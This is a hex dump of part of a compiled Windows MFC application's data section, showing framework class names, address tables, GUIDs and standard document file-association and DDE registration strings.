000612e0  58 2a 46 00 00 00 00 00  43 53 69 6e 67 6c 65 44  |X*F.....CSingleD|
000612f0  6f 63 54 65 6d 70 6c 61  74 65 00 00 90 6d 46 00  |ocTemplate...mF.|
00061300  d0 f8 44 00 b6 f0 43 00  00 16 40 00 f0 23 44 00  |⚠⚠D.⚠⚠C...@.⚠#D.|
00061310  64 98 43 00 f4 97 43 00  fa 97 43 00 ff 97 43 00  |d.C.⚠.C.⚠.C.⚠.C.|
00061320  02 98 43 00 05 98 43 00  4c 98 43 00 af 98 43 00  |..C...C.L.C.⚠.C.|
00061330  52 98 43 00 9f 98 43 00  5e 98 43 00 58 98 43 00  |R.C...C.^.C.X.C.|
00061340  96 98 43 00 9a 98 43 00  aa 98 43 00 a5 98 43 00  |..C...C.⚠.C.⚠.C.|
00061350  13 20 44 00 dd f0 43 00  e5 f0 43 00 f9 f0 43 00  |. D.⚠⚠C.⚠⚠C.⚠⚠C.|
00061360  0f f1 43 00 5b 21 44 00  86 21 44 00 3b 22 44 00  |.⚠C.[!D..!D.;"D.|
00061370  62 22 44 00 3f 23 44 00  53 23 44 00 8f 23 44 00  |b"D.?#D.S#D..#D.|
00061380  23 f1 43 00 d0 f2 43 00  bf 23 44 00 73 6f 66 74  |#⚠C.⚠⚠C.⚠#D.soft|
00061390  77 61 72 65 00 00 00 00  e0 6d 46 00 85 20 41 00  |ware....⚠mF.. A.|
000613a0  6c 18 41 00 84 18 41 00  bb 18 41 00 f5 18 41 00  |l.A...A.⚠.A.⚠.A.|
000613b0  3f 19 41 00 63 19 41 00  fd 1a 41 00 a2 1a 41 00  |?.A.c.A.⚠.A.⚠.A.|
000613c0  6c 88 41 00 00 00 00 00  e0 13 46 00 50 00 00 00  |l.A.....⚠.F.P...|
000613d0  ff ff 00 00 00 00 00 00  a8 fb 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
000613e0  43 44 6f 63 75 6d 65 6e  74 00 00 00 00 00 00 00  |CDocument.......|
000613f0  d8 fb 45 00 f8 13 46 00  11 01 00 00 00 00 00 00  |⚠⚠E.⚠.F.........|
00061400  02 e1 00 00 02 e1 00 00  0c 00 00 00 09 f6 43 00  |.⚠...⚠.......⚠C.|
00061410  11 01 00 00 00 00 00 00  03 e1 00 00 03 e1 00 00  |.........⚠...⚠..|
00061420  0c 00 00 00 21 f6 43 00  11 01 00 00 00 00 00 00  |....!⚠C.........|
00061430  04 e1 00 00 04 e1 00 00  0c 00 00 00 29 f6 43 00  |.⚠...⚠......)⚠C.|
00061440  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00061450  00 00 00 00 00 00 00 00  20 23 25 3b 2f 5c 00 00  |........ #%;/\..|
00061460  4d 46 43 00 52 65 70 6c  61 63 65 46 69 6c 65 00  |MFC.ReplaceFile.|
00061470  4b 45 52 4e 45 4c 33 32  00 00 00 00 48 6e 46 00  |KERNEL32....HnF.|
00061480  be 17 45 00 19 ff 43 00  00 16 40 00 5e c9 43 00  |⚠.E..⚠C...@.^⚠C.|
00061490  42 d5 43 00 c4 d5 43 00  46 d6 43 00 ea 20 41 00  |B⚠C.⚠⚠C.F⚠C.⚠ A.|
000614a0  09 fb 43 00 18 c7 43 00  2f c9 43 00 5b ca 43 00  |.⚠C..⚠C./⚠C.[⚠C.|
000614b0  87 ca 43 00 aa c8 43 00  e4 c8 43 00 09 ca 43 00  |.⚠C.⚠⚠C.⚠⚠C..⚠C.|
000614c0  32 ca 43 00 b0 fc 43 00  87 c9 43 00 c9 fc 43 00  |2⚠C.⚠⚠C..⚠C.⚠⚠C.|
000614d0  b4 ca 43 00 98 6e 46 00  c4 17 45 00 a2 20 41 00  |⚠⚠C..nF.⚠.E.⚠ A.|
000614e0  00 16 40 00 63 d1 43 00  4a b2 43 00 00 00 00 00  |..@.c⚠C.J⚠C.....|
000614f0  08 15 46 00 04 00 00 00  ff ff 00 00 00 00 00 00  |..F.....⚠⚠......|
00061500  00 00 00 00 00 00 00 00  43 4f 62 6a 65 63 74 00  |........CObject.|
00061510  f0 5a 5b 42 f1 65 d1 11  96 11 00 00 f8 1e 0d 0d  |⚠Z[B⚠e⚠.....⚠...|
00061520  70 07 ad 72 9f 6a d1 11  bc ec 00 60 08 8f 44 4e  |p.⚠r.j⚠.⚠⚠.`..DN|
00061530  51 20 ea b6 8a 04 d1 11  82 b9 00 c0 4f b9 94 2e  |Q ⚠⚠..⚠..⚠.⚠O⚠..|
00061540  50 20 ea b6 8a 04 d1 11  82 b9 00 c0 4f b9 94 2e  |P ⚠⚠..⚠..⚠.⚠O⚠..|
00061550  3b 05 ec 44 0f 40 d0 11  9d cd 00 a0 c9 03 91 d3  |;.⚠D.@⚠..⚠.⚠⚠..⚠|
00061560  3a 05 ec 44 0f 40 d0 11  9d cd 00 a0 c9 03 91 d3  |:.⚠D.@⚠..⚠.⚠⚠..⚠|
00061570  35 05 ec 44 0f 40 d0 11  9d cd 00 a0 c9 03 91 d3  |5.⚠D.@⚠..⚠.⚠⚠..⚠|
00061580  43 4f 62 41 72 72 61 79  00 00 00 00 e8 6e 46 00  |CObArray....⚠nF.|
00061590  8b fd 44 00 c0 3e 43 00  04 42 43 00 00 00 00 00  |.⚠D.⚠>C..BC.....|
000615a0  b8 15 46 00 18 01 00 00  ff ff 00 00 bc fd 44 00  |⚠.F.....⚠⚠..⚠⚠D.|
000615b0  a0 19 46 00 00 00 00 00  43 50 72 65 76 69 65 77  |⚠.F.....CPreview|
000615c0  56 69 65 77 00 00 00 00  d0 19 46 00 d0 15 46 00  |View....⚠.F.⚠.F.|
000615d0  05 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000615e0  11 00 00 00 f2 7e 45 00  01 00 00 00 00 00 00 00  |....⚠~E.........|
[....]
00061970  ea 66 43 00 a9 7e 43 00  74 58 43 00 d2 8d 43 00  |⚠fC.⚠~C.tXC.⚠.C.|
00061980  26 54 43 00 65 55 43 00  f9 8e 45 00 eb 57 43 00  |&TC.eUC.⚠.E.⚠WC.|
00061990  53 58 43 00 1d 8f 45 00  0c 57 43 00 00 00 00 00  |SXC...E..WC.....|
000619a0  b8 19 46 00 6c 00 00 00  ff ff 00 00 00 00 00 00  |⚠.F.l...⚠⚠......|
000619b0  00 02 46 00 00 00 00 00  43 53 63 72 6f 6c 6c 56  |..F.....CScrollV|
000619c0  69 65 77 00 00 00 00 00  00 00 00 00 00 00 00 00  |iew.............|
000619d0  48 1c 46 00 d8 19 46 00  05 00 00 00 00 00 00 00  |H.F.⚠.F.........|
000619e0  00 00 00 00 00 00 00 00  11 00 00 00 9e 0c 44 00  |..............D.|
000619f0  14 01 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00061a00  1d 00 00 00 f2 10 44 00  15 01 00 00 00 00 00 00  |....⚠.D.........|
00061a10  00 00 00 00 00 00 00 00  1d 00 00 00 36 11 44 00  |............6.D.|
00061a20  0a 02 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00061a30  2e 00 00 00 7e 11 44 00  00 00 00 00 00 00 00 00  |....~.D.........|
00061a40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00061a50  4d 6f 75 73 65 5a 00 00  4d 61 67 65 6c 6c 61 6e  |MouseZ..Magellan|
00061a60  20 4d 53 57 48 45 45 4c  00 00 00 00 57 68 65 65  | MSWHEEL....Whee|
00061a70  6c 53 63 72 6f 6c 6c 4c  69 6e 65 73 00 00 00 00  |lScrollLines....|
00061a80  43 6f 6e 74 72 6f 6c 20  50 61 6e 65 6c 5c 44 65  |Control Panel\De|
00061a90  73 6b 74 6f 70 00 00 00  4d 53 48 5f 53 43 52 4f  |sktop...MSH_SCRO|
00061aa0  4c 4c 5f 4c 49 4e 45 53  5f 4d 53 47 00 00 00 00  |LL_LINES_MSG....|
00061ab0  10 70 46 00 f7 fd 44 00  07 06 44 00 00 16 40 00  |.pF.⚠⚠D...D...@.|
00061ac0  0b 16 44 00 eb 66 43 00  f4 97 43 00 fa 97 43 00  |..D.⚠fC.⚠.C.⚠.C.|
00061ad0  ff 97 43 00 02 98 43 00  05 98 43 00 9d 04 44 00  |⚠.C...C...C...D.|
[....]
00061bb0  fa 16 44 00 78 19 44 00  7b 19 44 00 00 00 00 00  |⚠.D.x.D.{.D.....|
00061bc0  d8 1b 46 00 48 00 00 00  ff ff 00 00 00 00 00 00  |⚠.F.H...⚠⚠......|
00061bd0  00 02 46 00 00 00 00 00  43 43 74 72 6c 56 69 65  |..F.....CCtrlVie|
00061be0  77 00 00 00 00 00 00 00  00 1c 46 00 c4 00 00 00  |w.........F.⚠...|
00061bf0  ff ff 00 00 00 00 00 00  f8 f5 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
00061c00  43 53 70 6c 69 74 74 65  72 57 6e 64 00 00 00 00  |CSplitterWnd....|
00061c10  48 1c 46 00 18 1c 46 00  0f 00 00 00 00 00 00 00  |H.F...F.........|
00061c20  00 00 00 00 00 00 00 00  0c 00 00 00 b8 1a 44 00  |............⚠.D.|
[....]
00061d60  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00061d70  88 1d 46 00 08 00 00 00  ff ff 00 00 29 fe 44 00  |..F.....⚠⚠..)⚠D.|
00061d80  98 1d 46 00 00 00 00 00  43 54 65 6d 70 4d 65 6e  |..F.....CTempMen|
00061d90  75 00 00 00 00 00 00 00  b0 1d 46 00 08 00 00 00  |u.......⚠.F.....|
00061da0  ff ff 00 00 09 fe 44 00  f0 14 46 00 00 00 00 00  |⚠⚠...⚠D.⚠.F.....|
00061db0  43 4d 65 6e 75 00 00 00  60 70 46 00 23 fe 44 00  |CMenu...`pF.#⚠D.|
00061dc0  f0 fa 40 00 00 16 40 00  fb b1 43 00 fe b1 43 00  |⚠⚠@...@.⚠⚠C.⚠⚠C.|
00061dd0  b0 70 46 00 8e fe 44 00  45 fe 44 00 00 16 40 00  |⚠pF..⚠D.E⚠D...@.|
00061de0  fb b1 43 00 fe b1 43 00  63 6f 6d 62 6f 62 6f 78  |⚠⚠C.⚠⚠C.combobox|
00061df0  00 00 00 00 00 71 46 00  eb fe 44 00 50 71 46 00  |.....qF.⚠⚠D.PqF.|
00061e00  13 00 45 00 a0 71 46 00  0b 01 45 00 f0 71 46 00  |..E.⚠qF...E.⚠qF.|
00061e10  a4 02 45 00 00 00 00 00  30 1e 46 00 98 00 00 00  |⚠.E.....0.F.....|
00061e20  ff ff 00 00 00 00 00 00  78 1e 46 00 00 00 00 00  |⚠⚠......x.F.....|
00061e30  43 4e 6f 74 53 75 70 70  6f 72 74 65 64 45 78 63  |CNotSupportedExc|
00061e40  65 70 74 69 6f 6e 00 00  60 1e 46 00 98 00 00 00  |eption..`.F.....|
00061e50  ff ff 00 00 00 00 00 00  78 1e 46 00 00 00 00 00  |⚠⚠......x.F.....|
00061e60  43 4d 65 6d 6f 72 79 45  78 63 65 70 74 69 6f 6e  |CMemoryException|
00061e70  00 00 00 00 00 00 00 00  90 1e 46 00 08 00 00 00  |..........F.....|
00061e80  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
00061e90  43 45 78 63 65 70 74 69  6f 6e 00 00 48 72 46 00  |CException..HrF.|
00061ea0  ca 02 45 00 37 21 41 00  00 16 40 00 0a 17 43 00  |⚠.E.7!A...@...C.|
00061eb0  4a b2 43 00 a0 72 46 00  02 03 45 00 84 21 41 00  |J⚠C.⚠rF...E..!A.|
00061ec0  00 16 40 00 0a 17 43 00  4a b2 43 00 41 42 43 44  |..@...C.J⚠C.ABCD|
00061ed0  45 46 47 48 49 4a 4b 4c  4d 4e 4f 50 51 52 53 54  |EFGHIJKLMNOPQRST|
00061ee0  55 56 57 58 59 5a 61 62  63 64 65 66 67 68 69 6a  |UVWXYZabcdefghij|
00061ef0  6b 6c 6d 6e 6f 70 71 72  73 74 75 76 77 78 79 7a  |klmnopqrstuvwxyz|
00061f00  00 00 00 00 53 79 73 74  65 6d 00 00 f0 72 46 00  |....System..⚠rF.|
00061f10  b7 06 45 00 38 73 46 00  a7 21 41 00 00 00 00 00  |⚠.E.8sF.⚠!A.....|
00061f20  38 1f 46 00 1c 00 00 00  ff ff 00 00 00 00 00 00  |8.F.....⚠⚠......|
00061f30  f0 14 46 00 00 00 00 00  43 4d 61 70 50 74 72 54  |⚠.F.....CMapPtrT|
00061f40  6f 50 74 72 00 00 00 00  88 73 46 00 a7 09 45 00  |oPtr.....sF.⚠.E.|
00061f50  05 49 43 00 00 16 40 00  43 54 4c 33 44 33 32 2e  |.IC...@.CTL3D32.|
00061f60  44 4c 4c 00 00 00 00 00  80 1f 46 00 1c 00 00 00  |DLL.......F.....|
00061f70  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
00061f80  43 50 74 72 4c 69 73 74  00 00 00 00 d8 73 46 00  |CPtrList....⚠sF.|
00061f90  00 0e 45 00 97 42 43 00  00 16 40 00 00 00 00 00  |..E..BC...@.....|
00061fa0  18 f6 45 00 a8 1f 46 00  13 01 00 00 00 00 00 00  |.⚠E.⚠.F.........|
00061fb0  00 00 00 00 00 00 00 00  0d 00 00 00 68 73 44 00  |............hsD.|
[....]
00062150  00 00 00 00 00 00 00 00  70 21 46 00 1c 00 00 00  |........p!F.....|
00062160  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
00062170  43 4d 61 70 53 74 72 69  6e 67 54 6f 50 74 72 00  |CMapStringToPtr.|
00062180  28 74 46 00 4e 0f 45 00  d2 4b 43 00 00 16 40 00  |(tF.N.E.⚠KC...@.|
00062190  49 36 34 00 00 00 00 00  b0 21 46 00 cc 00 00 00  |I64.....⚠!F.⚠...|
000621a0  ff ff 00 00 54 0f 45 00  20 02 46 00 00 00 00 00  |⚠⚠..T.E. .F.....|
000621b0  43 4d 69 6e 69 46 72 61  6d 65 57 6e 64 00 00 00  |CMiniFrameWnd...|
000621c0  48 02 46 00 c8 21 46 00  85 00 00 00 00 00 00 00  |H.F.⚠!F.........|
000621d0  00 00 00 00 00 00 00 00  0c 00 00 00 76 d0 44 00  |............v⚠D.|
[....]
00062420  67 b8 44 00 39 c0 44 00  5a a9 44 00 6a bb 44 00  |g⚠D.9⚠D.Z⚠D.j⚠D.|
00062430  27 ab 44 00 05 a2 44 00  c6 be 44 00 e9 a2 44 00  |'⚠D..⚠D.⚠⚠D.⚠⚠D.|
00062440  53 6d 61 6c 6c 20 46 6f  6e 74 73 00 54 65 72 6d  |Small Fonts.Term|
00062450  69 6e 61 6c 00 00 00 00  70 24 46 00 14 00 00 00  |inal....p$F.....|
00062460  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
00062470  43 50 74 72 41 72 72 61  79 00 00 00 b8 74 46 00  |CPtrArray...⚠tF.|
00062480  8f 0f 45 00 64 45 43 00  00 16 40 00 00 75 46 00  |..E.dEC...@..uF.|
00062490  a1 82 44 00 af 87 44 00  a7 8a 44 00 00 00 00 00  |⚠.D.⚠.D.⚠.D.....|
000624a0  e8 f3 45 00 a8 24 46 00  53 00 00 00 00 00 00 00  |⚠⚠E.⚠$F.S.......|
000624b0  00 00 00 00 00 00 00 00  2a 00 00 00 59 27 43 00  |........*...Y'C.|
000624c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000624d0  00 00 00 00 00 00 00 00  63 6f 6d 6d 64 6c 67 5f  |........commdlg_|
000624e0  53 65 74 52 47 42 43 6f  6c 6f 72 00 63 6f 6d 6d  |SetRGBColor.comm|
000624f0  64 6c 67 5f 68 65 6c 70  00 00 00 00 63 6f 6d 6d  |dlg_help....comm|
00062500  64 6c 67 5f 43 6f 6c 6f  72 4f 4b 00 63 6f 6d 6d  |dlg_ColorOK.comm|
00062510  64 6c 67 5f 46 69 6c 65  4e 61 6d 65 4f 4b 00 00  |dlg_FileNameOK..|
00062520  63 6f 6d 6d 64 6c 67 5f  53 68 61 72 65 56 69 6f  |commdlg_ShareVio|
00062530  6c 61 74 69 6f 6e 00 00  63 6f 6d 6d 64 6c 67 5f  |lation..commdlg_|
00062540  4c 42 53 65 6c 43 68 61  6e 67 65 64 4e 6f 74 69  |LBSelChangedNoti|
00062550  66 79 00 00 00 00 00 00  70 25 46 00 b0 00 00 00  |fy......p%F.⚠...|
00062560  ff ff 00 00 00 00 00 00  c8 f3 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
00062570  43 50 61 67 65 53 65 74  75 70 44 69 61 6c 6f 67  |CPageSetupDialog|
00062580  00 00 00 00 00 00 00 00  a0 25 46 00 a4 00 00 00  |........⚠%F.⚠...|
00062590  ff ff 00 00 00 00 00 00  c8 f3 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
000625a0  43 50 72 69 6e 74 44 69  61 6c 6f 67 00 00 00 00  |CPrintDialog....|
000625b0  a0 24 46 00 b8 25 46 00  11 01 00 00 00 00 00 00  |⚠$F.⚠%F.........|
000625c0  00 04 00 00 00 04 00 00  0c 00 00 00 00 2b 43 00  |.............+C.|
[....]
000627b0  69 c2 43 00 28 c5 43 00  aa c4 43 00 f3 bf 43 00  |i⚠C.(⚠C.⚠⚠C.⚠⚠C.|
000627c0  26 25 64 20 00 00 00 00  e0 27 46 00 20 00 00 00  |&%d ....⚠'F. ...|
000627d0  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
000627e0  43 44 6f 63 4d 61 6e 61  67 65 72 00 00 00 00 00  |CDocManager.....|
000627f0  e8 f3 45 00 f8 27 46 00  11 01 00 00 02 00 00 00  |⚠⚠E.⚠'F.........|
00062800  64 00 00 00 64 00 00 00  0c 00 00 00 a4 11 41 00  |d...d.......⚠.A.|
00062810  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00062820  00 00 00 00 00 00 00 00  00 00 00 00 4e 75 6c 6c  |............Null|
00062830  46 69 6c 65 00 00 00 00  5b 70 72 69 6e 74 74 6f  |File....[printto|
00062840  28 22 25 31 22 2c 22 25  32 22 2c 22 25 33 22 2c  |("%1","%2","%3",|
00062850  22 25 34 22 29 5d 00 00  5b 70 72 69 6e 74 28 22  |"%4")]..[print("|
00062860  25 31 22 29 5d 00 00 00  5b 6f 70 65 6e 28 22 25  |%1")]...[open("%|
00062870  31 22 29 5d 00 00 00 00  64 64 65 65 78 65 63 00  |1")]....ddeexec.|
00062880  20 2f 64 64 65 00 00 00  20 2f 70 74 20 22 25 31  | /dde... /pt "%1|
00062890  22 20 22 25 32 22 20 22  25 33 22 20 22 25 34 22  |" "%2" "%3" "%4"|
000628a0  00 00 00 00 20 2f 70 20  22 25 31 22 00 00 00 00  |.... /p "%1"....|
000628b0  20 22 25 31 22 00 00 00  63 6f 6d 6d 61 6e 64 00  | "%1"...command.|
000628c0  2c 25 64 00 25 73 5c 53  68 65 6c 6c 4e 65 77 00  |,%d.%s\ShellNew.|
000628d0  25 73 5c 44 65 66 61 75  6c 74 49 63 6f 6e 00 00  |%s\DefaultIcon..|
000628e0  25 73 5c 73 68 65 6c 6c  5c 70 72 69 6e 74 74 6f  |%s\shell\printto|
000628f0  5c 25 73 00 25 73 5c 73  68 65 6c 6c 5c 70 72 69  |\%s.%s\shell\pri|
00062900  6e 74 5c 25 73 00 00 00  25 73 5c 73 68 65 6c 6c  |nt\%s...%s\shell|
00062910  5c 6f 70 65 6e 5c 25 73  00 00 00 00 58 76 46 00  |\open\%s....XvF.|
00062920  ac 17 45 00 ec 10 45 00  00 16 40 00 9f 92 44 00  |⚠.E.⚠.E...@...D.|
00062930  04 93 44 00 08 93 44 00  6f 13 45 00 8f 1d 44 00  |..D...D.o.E...D.|
00062940  18 93 44 00 37 93 44 00  d0 1e 44 00 55 93 44 00  |..D.7.D.⚠.D.U.D.|
00062950  39 95 44 00 1d 9b 44 00  e9 9b 44 00 2a 2e 2a 00  |9.D...D.⚠.D.*.*.|
00062960  22 2c 22 00 5b 70 72 69  6e 74 74 6f 28 22 00 00  |",".[printto("..|
00062970  5b 70 72 69 6e 74 28 22  00 00 00 00 5b 6f 70 65  |[print("....[ope|
00062980  6e 28 22 00 b0 76 46 00  c3 e1 44 00 cd 9b 44 00  |n(".⚠vF.⚠⚠D.⚠.D.|
00062990  00 16 40 00 dd 4f 43 00  eb 66 43 00 f4 97 43 00  |..@.⚠OC.⚠fC.⚠.C.|
000629a0  fa 97 43 00 ff 97 43 00  02 98 43 00 05 98 43 00  |⚠.C.⚠.C...C...C.|
[....]
00062a50  6c 58 43 00 0c 57 43 00  70 2a 46 00 64 00 00 00  |lXC..WC.p*F.d...|
00062a60  ff ff 00 00 00 00 00 00  a8 fb 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
00062a70  43 44 6f 63 54 65 6d 70  6c 61 74 65 00 00 00 00  |CDocTemplate....|
00062a80  60 fc 45 00 88 2a 46 00  80 4e 46 00 34 00 00 00  |`⚠E..*F..NF.4...|
00062a90  00 00 00 00 ff ff ff ff  f8 fb 45 00 a8 2a 46 00  |....⚠⚠⚠⚠⚠⚠E.⚠*F.|
00062aa0  58 21 47 00 54 21 47 00  00 00 00 00 ff ff ff ff  |X!G.T!G.....⚠⚠⚠⚠|
[....]
00062f50  9a 99 99 99 99 99 b9 3f  70 2f 46 00 28 00 00 00  |......⚠?p/F.(...|
00062f60  ff ff 00 00 00 00 00 00  e8 2f 46 00 00 00 00 00  |⚠⚠......⚠/F.....|
00062f70  43 4d 65 6d 46 69 6c 65  00 00 00 00 80 7d 46 00  |CMemFile.....}F.|
00062f80  b8 17 45 00 75 9c 44 00  00 16 40 00 a7 9d 44 00  |⚠.E.u.D...@.⚠.D.|
00062f90  42 d5 43 00 c4 d5 43 00  46 d6 43 00 ea 20 41 00  |B⚠C.⚠⚠C.F⚠C.⚠ A.|
00062fa0  8d c7 43 00 30 9f 44 00  aa 9e 44 00 04 9e 44 00  |.⚠C.0.D.⚠.D...D.|
00062fb0  87 ca 43 00 27 9e 44 00  68 9e 44 00 20 9f 44 00  |.⚠C.'.D.h.D. .D.|
00062fc0  28 9f 44 00 1b 9f 44 00  f0 9e 44 00 f1 9e 44 00  |(.D...D.⚠.D.⚠.D.|
00062fd0  38 9f 44 00 56 9d 44 00  63 9d 44 00 75 9d 44 00  |8.D.V.D.c.D.u.D.|
00062fe0  9a 9d 44 00 ab 9d 44 00  00 30 46 00 10 00 00 00  |..D.⚠.D..0F.....|
00062ff0  ff ff 00 00 00 00 00 00  f0 14 46 00 00 00 00 00  |⚠⚠......⚠.F.....|
00063000  43 46 69 6c 65 00 00 00  ee 14 02 00 00 00 00 00  |CFile...⚠.......|
00063010  c0 00 00 00 00 00 00 46  01 14 02 00 00 00 00 00  |⚠......F........|
00063020  c0 00 00 00 00 00 00 46  b8 7d 46 00 be 17 45 00  |⚠......F⚠}F.⚠.E.|
00063030  f5 c5 43 00 00 16 40 00  5e c9 43 00 42 d5 43 00  |⚠⚠C...@.^⚠C.B⚠C.|
00063040  c4 d5 43 00 46 d6 43 00  ea 20 41 00 8d c7 43 00  |⚠⚠C.F⚠C.⚠ A..⚠C.|
00063050  18 c7 43 00 2f c9 43 00  5b ca 43 00 87 ca 43 00  |.⚠C./⚠C.[⚠C..⚠C.|
00063060  aa c8 43 00 e4 c8 43 00  09 ca 43 00 32 ca 43 00  |⚠⚠C.⚠⚠C..⚠C.2⚠C.|
00063070  e9 c9 43 00 87 c9 43 00  a8 c9 43 00 b4 ca 43 00  |⚠⚠C..⚠C.⚠⚠C.⚠⚠C.|
00063080  44 6c 6c 47 65 74 43 6c  61 73 73 4f 62 6a 65 63  |DllGetClassObjec|
00063090  74 00 00 00 7b 25 30 38  58 2d 25 30 34 58 2d 25  |t...{%08X-%04X-%|
000630a0  30 34 58 2d 25 30 32 58  25 30 32 58 2d 25 30 32  |04X-%02X%02X-%02|
000630b0  58 25 30 32 58 25 30 32  58 25 30 32 58 25 30 32  |X%02X%02X%02X%02|
000630c0  58 25 30 32 58 7d 00 00  49 6e 50 72 6f 63 53 65  |X%02X}..InProcSe|
000630d0  72 76 65 72 33 32 00 00  43 4c 53 49 44 00 00 00  |rver32..CLSID...|
000630e0  f8 30 46 00 14 00 00 00  ff ff 00 00 00 00 00 00  |⚠0F.....⚠⚠......|
000630f0  78 1e 46 00 00 00 00 00  43 46 69 6c 65 45 78 63  |x.F.....CFileExc|
00063100  65 70 74 69 6f 6e 00 00  20 31 46 00 10 00 00 00  |eption.. 1F.....|
00063110  ff ff 00 00 00 00 00 00  78 1e 46 00 00 00 00 00  |⚠⚠......x.F.....|
00063120  43 41 72 63 68 69 76 65  45 78 63 65 70 74 69 6f  |CArchiveExceptio|
00063130  6e 00 00 00 08 7e 46 00  ca 17 45 00 57 8c 41 00  |n....~F.⚠.E.W.A.|
00063140  00 16 40 00 3b 24 44 00  4a b2 43 00 00 00 00 00  |..@.;$D.J⚠C.....|
00063150  68 31 46 00 40 00 00 00  ff ff 00 00 00 00 00 00  |h1F.@...⚠⚠......|
00063160  78 fe 45 00 00 00 00 00  43 50 72 65 76 69 65 77  |x⚠E.....CPreview|
00063170  44 43 00 00 58 7e 46 00  d0 17 45 00 82 99 45 00  |DC..X~F.⚠.E...E.|
00063180  00 16 40 00 05 9a 45 00  9e 99 45 00 f6 db 43 00  |..@...E...E.⚠⚠C.|
00063190  ed 99 45 00 91 9a 45 00  e0 9a 45 00 ff 9b 45 00  |⚠.E...E.⚠.E.⚠.E.|
000631a0  f4 9d 45 00 33 9e 45 00  64 9e 45 00 95 9e 45 00  |⚠.E.3.E.d.E...E.|
000631b0  b8 9e 45 00 ed 9e 45 00  22 9f 45 00 59 9f 45 00  |⚠.E.⚠.E.".E.Y.E.|
000631c0  96 9f 45 00 cd 9f 45 00  ef e1 43 00 33 16 41 00  |..E.⚠.E.⚠⚠C.3.A.|
000631d0  47 16 41 00 ac a2 45 00  c9 a2 45 00 d4 a3 45 00  |G.A.⚠⚠E.⚠⚠E.⚠⚠E.|
000631e0  ee a4 45 00 34 a5 45 00  4c a5 45 00 09 00 00 00  |⚠⚠E.4⚠E.L⚠E.....|
000631f0  41 00 00 00 00 00 00 00  10 32 46 00 58 00 00 00  |A........2F.X...|
00063200  ff ff 00 00 00 00 00 00  f8 f5 45 00 00 00 00 00  |⚠⚠......⚠⚠E.....|
00063210  43 54 6f 6f 6c 54 69 70  43 74 72 6c 00 00 00 00  |CToolTipCtrl....|
00063220  18 f6 45 00 28 32 46 00  6c 03 00 00 00 00 00 00  |.⚠E.(2F.l.......|
00063230  00 00 00 00 00 00 00 00  0a 00 00 00 91 33 43 00  |.............3C.|
[....]
00063350  79 86 43 00 d2 8d 43 00  5e 8a 43 00 03 33 43 00  |y.C.⚠.C.^.C..3C.|
00063360  74 6f 6f 6c 74 69 70 73  5f 63 6c 61 73 73 33 32  |tooltips_class32|
00063370  00 00 00 00 00 7f 46 00  04 e5 44 00 b0 8d 41 00  |......F..⚠D.⚠.A.|
00063380  00 16 40 00 2e 49 4e 49  00 00 00 00 2e 48 4c 50  |..@..INI.....HLP|
00063390  00 00 00 00 00 00 00 00  b0 33 46 00 20 00 00 00  |........⚠3F. ...|
000633a0  ff ff 00 00 00 00 00 00  78 1e 46 00 00 00 00 00  |⚠⚠......x.F.....|
000633b0  43 4f 6c 65 44 69 73 70  61 74 63 68 45 78 63 65  |COleDispatchExce|
000633c0  70 74 69 6f 6e 00 00 00  00 00 00 00 00 00 00 00  |ption...........|
000633d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000633e0  04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
000635b0  88 40 45 00 58 80 46 00  ec 40 45 00 ce 40 45 00  |.@E.X.F.⚠@E.⚠@E.|
000635c0  dd 40 45 00 03 41 45 00  8b 41 45 00 e9 41 45 00  |⚠@E..AE..AE.⚠AE.|
000635d0  fb 41 45 00 52 69 63 68  45 64 69 74 20 54 65 78  |⚠AE.RichEdit Tex|
000635e0  74 20 61 6e 64 20 4f 62  6a 65 63 74 73 00 00 00  |t and Objects...|
000635f0  52 69 63 68 20 54 65 78  74 20 46 6f 72 6d 61 74  |Rich Text Format|
00063600  00 00 00 00 46 69 6c 65  4e 61 6d 65 57 00 00 00  |....FileNameW...|
00063610  46 69 6c 65 4e 61 6d 65  00 00 00 00 4c 69 6e 6b  |FileName....Link|
00063620  20 53 6f 75 72 63 65 20  44 65 73 63 72 69 70 74  | Source Descript|
00063630  6f 72 00 00 4f 62 6a 65  63 74 20 44 65 73 63 72  |or..Object Descr|
00063640  69 70 74 6f 72 00 00 00  4c 69 6e 6b 20 53 6f 75  |iptor...Link Sou|
00063650  72 63 65 00 45 6d 62 65  64 20 53 6f 75 72 63 65  |rce.Embed Source|
00063660  00 00 00 00 45 6d 62 65  64 64 65 64 20 4f 62 6a  |....Embedded Obj|
00063670  65 63 74 00 4f 62 6a 65  63 74 4c 69 6e 6b 00 00  |ect.ObjectLink..|
00063680  4f 77 6e 65 72 4c 69 6e  6b 00 00 00 4e 61 74 69  |OwnerLink...Nati|
00063690  76 65 00 00 18 81 46 00  f4 3c 43 00 e9 3c 43 00  |ve....F.⚠<C.⚠<C.|
000636a0  ef 3c 43 00 38 3d 43 00  90 3d 43 00 e9 3d 43 00  |⚠<C.8=C..=C.⚠=C.|
000636b0  69 3e 43 00 71 3e 43 00  79 3e 43 00 81 3e 43 00  |i>C.q>C.y>C..>C.|
000636c0  89 3e 43 00 91 3e 43 00  99 3e 43 00 a1 3e 43 00  |.>C..>C..>C.⚠>C.|
